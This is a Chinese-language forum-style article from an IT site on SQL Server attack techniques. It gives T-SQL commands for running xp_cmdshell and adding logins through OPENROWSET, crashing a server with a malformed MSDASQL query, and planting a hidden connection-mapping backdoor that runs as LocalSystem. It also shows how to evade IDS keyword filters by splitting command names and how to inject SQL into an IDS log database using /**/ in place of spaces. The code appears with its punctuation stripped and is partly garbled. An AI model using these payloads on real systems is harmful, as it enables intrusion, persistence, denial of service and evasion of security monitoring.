数据库

位置:IT落伍者 >> 数据库 >> 浏览文章

sql server新漏洞和一些突破口


发布日期:2022年02月08日
 
sql server新漏洞和一些突破口

下面我要谈到一些sqlserver新的bug虽然本人经过长时间的努力当然也有点幸运的成分在内才得以发现不敢一个人独享拿出来请大家鑒别当然很有可能有些高手早已知道了毕竟我接触sqlserver的时间不到P

.关于openrowset和opendatasource

可能这个技巧早有人已经会了就是利用openrowset发送本地命令通常我们的用法是(包括MSDN的列子)如下

select * from openrowset(sqloledbmyserver;sa;select * from table)

可见(即使从字面意义上看)openrowset只是作为一个快捷的远程数据库访问它必须跟在select后面也就是说需要返回一个recordset

那么我们能不能利用它调用xp_cmdshell呢?答案是肯定的!

select * from openrowset(sqloledbserver;sa;set fmtonly off exec masterdboxp_cmdshel l dir c:\)

必须加上set fmtonly off用来屏蔽默认的只返回列信息的设置这样xp_cmdshell返回的output集合就会提交给前面的select显示如果采用默认设置会返回空集合导致select出错命令也就无法执行了

那么如果我们要调用sp_addlogin呢他不会像xp_cmdshell返回任何集合的我们就不能再依靠fmtonly设置了可以如下操作

select * from openrowset(sqloledbserver;sa;select OK! exec masterdbosp_addlogin Hectic)

这样命令至少会返回select OK!的集合你的机器商会显示OK!同时对方的数据库内也会增加一个Hectic的账号也就是说我们利用select OK!的返回集合欺骗了本地的select请求是命令能够正常执行通理sp_addsrvrolemember和opendatasource也可以如此操作!至于这个方法真正的用处大家慢慢想吧P

.关于msdasql两次请求的问题

不知道大家有没有试过用msdasql连接远程数据库当然这个api必须是sqlserver的管理员才可以调用那么如下

select * from openrowset(msdasqldriver={sqlserver};server=server;address=server;uid=sa;pwd=;database=master;network=dbmssocnselect * from table select * from table)

当table和table的字段数目不相同时你会发现对方的sqlserver崩溃了连本地连接都会失败而系统资源占用一切正常用pskill杀死sqlserver进程后如果不重启机器sqlserver要么无法正常启动要么时常出现非法操作我也只是碰巧找到这个bug的具体原因我还没有摸透而且很奇怪的是这个现象只出现在msdasql上sqloledb就没有这个问题看来问题不是在于请求集合数目和返回集合数目不匹配上应该还是msdasql本身的问题具体原因大家一起慢慢研究吧P

.可怕的后门

以前在网上看到有人说在sqlserver上留后门可以通过添加trigerjobs或改写sp_addlogin和sp_addsrvrolemember做到这些方法当然可行但是很容易会被发现不知道大家有没有想过sqloledb的本地连接映射呵呵比如你在对方的sqlserver上用sqlserver的管理员账号执行如下的命令

select * from openrowset(sqloledbtrusted_connection=yes;data source=Hecticset fmtonly off exec masterxp_cmdshell dir c:\)

这样在对方的sqlserver上建立了一个名为Hectic的本地连接映射只要sqlserver不重启这个映射会一直存在下去至少我现在还不知道如何发现别人放置的连接映射好了以上的命令运行过后你会发现哪怕是sqlserver没有任何权限的guest用户运行以上这条命令也一样能通过!而且权限是localsystem!(默认安装)呵呵!这个方法可以用来在以被入侵过获得管理员权限的sqlserver上留下一个后门了以上的方法在sqlserver+sqlserverSP上通过!

另外还有一个猜测不知道大家有没有注意过windows默认附带的两个dsn一个是localserver一个是msqi这两个在建立的时候是本地管理员账号连接sqlserver的如果对方的sqlserver是通过自定义的power user启动那么sa的权限就和power user一样很难有所大作为但是我们通过如下的命令

select * from openrowset(msdasqldsn=locaserver;trusted_connection=yesset fmtonly off exec masterxp_cmdshell dir c:\)应该可以利用localserver的管理员账号连接本地sqlserver然后再以这个 账号的权限执行本地命令了这是后我想应该能突破sa那个power user权限了现在的问题是sqloledb无法调用dsn连接而msdasql非管理员不让调用所以我现在正在寻找guest调用msdasql的方法

如果有人知道这个bug如何突破或有新的想法我们可以一起讨论一下这个发放如果能成功被guest利用将会是一个很严重的安全漏洞因为我们前面提到的任何sql语句都可以提交给对方的asp去帮我们执行P

.利用tsql骗过ids或攻击ids

现在的ids已经变得越来越聪明了有的ids加入了xp_cmdshell sp_addlogin 的监视但是毕竟人工智能没有出现的今天这种监视总是有种骗人的感觉

先说说欺骗ids:

ids既然监视xp_cmdshell关键字那么我们可以这么做

declare @a sysname set @a=xp_+cmdshell exec @a dir c:\

这个代码相信大家都能看明白还有xp_cmdshell作为一个store procedure在master库内有一个id号固定的我们也可以这么做

假设这个id=

declare @a sysname select @a=name from sysobjects where id= exec @a dir c:\

当然也可以

declare @a sysname select @a=name from sysobjects where id=+ exec @a dir c:\

这种做法排列组合ids根本不可能做的到完全监视

同理sp_addlogin也可以这么做

再说说攻击ids:

因为ids数据量很大日至通常备份到常规数据库比如sql server

如果用古老的recordsetaddnew做法会严重影响ids的性能因为通过ado做tsql请求不但效率高而且有一部分工作可以交给sql server去做

通常程序会这么写 insert table values (日至内容)

那么我们想想看如果用 temp) exec xp_cmdshell dir c:\ 提交后会变成

insert table values (日至内容temp) exec xp_cmdshell dir c:\ )

这样xp_cmdshell就可以在ids的数据库运行了

当然ids是一个嗅歎器他会抓所有的报而浏览器提交的时候会把空格变成%因此%会被提交到sql server这样你的命令就无法执行了唯一的办法就是

insert/**/table/**/values(日至内容temp)/**/exec/**/xp_cmdshell/**/dir c:\/**/ )

用/**/代替空格做间隔符这样你的tsql才能在ids的数据库内执行当然也可以用其他语句可以破坏备份ids的数据库到你的共享目录呵呵

其实这种方法的原理和攻击asp是一样的只是把空格变成了/**/本来asp是select语句那么用就可以屏蔽现在ids用insert语句那么用)屏蔽

好了其他很多新的入侵语句大家可以自己慢慢想最好的测试工具就是query analyzer了

上一篇:SQL Server 2008 化茧成蝶

下一篇:向外扩展SQL Server系统的两个选项